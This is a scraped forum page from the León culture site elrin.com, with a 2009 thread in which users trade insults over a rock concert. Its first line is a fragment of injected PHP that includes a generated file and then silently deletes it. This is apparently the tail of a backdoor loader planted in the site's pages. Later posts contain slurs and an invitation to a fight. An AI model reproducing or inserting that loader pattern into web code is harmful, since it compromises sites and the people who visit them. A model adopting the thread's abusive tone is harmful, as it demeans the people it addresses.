");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Opinodromo de el Rin.com, E-zine Inquieto y Agenda Cultural de León
Logo elrin.com
uvedoble-uvedoble-uvedoble-punto-elrin-punto-com elRin
Los datos de elRin.COM 1840 noticias publicadas
1690 Rineros registrados
0 Rineros conectados
10 anonimos conectados
652 mensajes en el foro
14069 mensajes en el foro antiguo
OpinodromoEl webmaster se reserva el derecho de eliminar aquellos mensajes que sean ofensivos a petición del aludido o por propia iniciativa.
Volver al índice

eran al & the black cats?

menudos gañanazos, si no sabían tocar...mucho contrabajo y mucha guitarra chula y no tocaban un pijo. Mucho notas. Aparte de la puta mierda que me tragué es necesario decirles a los que fueron que los 3 músicos que tocaron ayer no son los que salen en los videos del grupo que tienen colgado en su myspace, y tampoco sonaban nada a las conciones que tienen grabadas. Vete a saber quienes serían los que tocaron ayer, nos dieron gato por liebre y todos tan tranquilos...en fin, que más da. con beber unas copas y ver a unos gañanes dar saltos ya se pasa la noche.

M.Campo Vidal - 30 Oct 2009

...

Pues a mi me pareció un concierto cojonudo... no se si musicalmente eran tan complicados como exigen los canones pero tenían lo que yo buscaba: una fuerza increible, desenfreno rock & roll y actitud...allí no podía quedarse parado nadie...

Por cierto, desde Septiembre el contrabajista abandonó el grupo cansado de andar todo el día de gira... el batería se puso a aprender a tocar el contrabajo... (y parece que cumple no?)... y el que tocaba la batería es el manager del grupo... Por tanto, sólo había un miembro cambiado.

Ellos lo publicaron en su myspace hace como tres meses y se reprodujo en un artículo en Septiembre: http://www.sinpunktofijo.com/index.php">http://www.sinpunktofijo.com/index.php?option=com_content&task=view&id=350&Itemi

d=28

motherfucker - 6 Nov 2009

actitud?

esa palabra se usa mucho en el punk. Que actitud? dar saltos? hacer canciones de 2 notas que te permitan saltar y bailar mientras tocas? sois unos gañanes TODOS que no teneis ni puta idea de lo que es el rock, ni lo aprendereis en la puta vida. Eran unos imitadores de Green Day con contrabajo, yo a Green Day los escuchaba con 15 años, ya vamos cumpliendo años y el punk sigue evolucionando, aunque a veces los grupos hagan canciones muy raras/complicadas para vosotros. que en vez de orejas, teneis dos putos muñones.

M.Campo Vidal - 6 Nov 2009

Tu sigue descalificando

.... que parece que es lo único que sabes hacer....

motherfucker - 7 Nov 2009

desde luego...

cada cierto tiempo te renuevas, pero solo de nick.

Si tanto sabes de rock escribe una definición y ponla aquí,para que nos partamos el culo un poco más de tí.

Y bueno, yo creo que a los 15 años lo que tu escuchabas eran las collejas que te daban, pero eso seguro que no ha cambiado mucho, no? jajaja evoluciona penoso!

Zoso - 15 Nov 2009

collejas?

a mi no me daba collejas nadie, anormal, estoy esperando a que me las des tú un día si tienes cojones, hijodeperra.

M.Campo Vidal - 15 Nov 2009

Volver al índice
Opinodromo

Último mensaje

Opinodromo antiguo
Tablón de anuncios

Estamos en ello

Estamos trabajando en el nuevo tablón de anuncios. Todavia no está operativo.

Grupos de León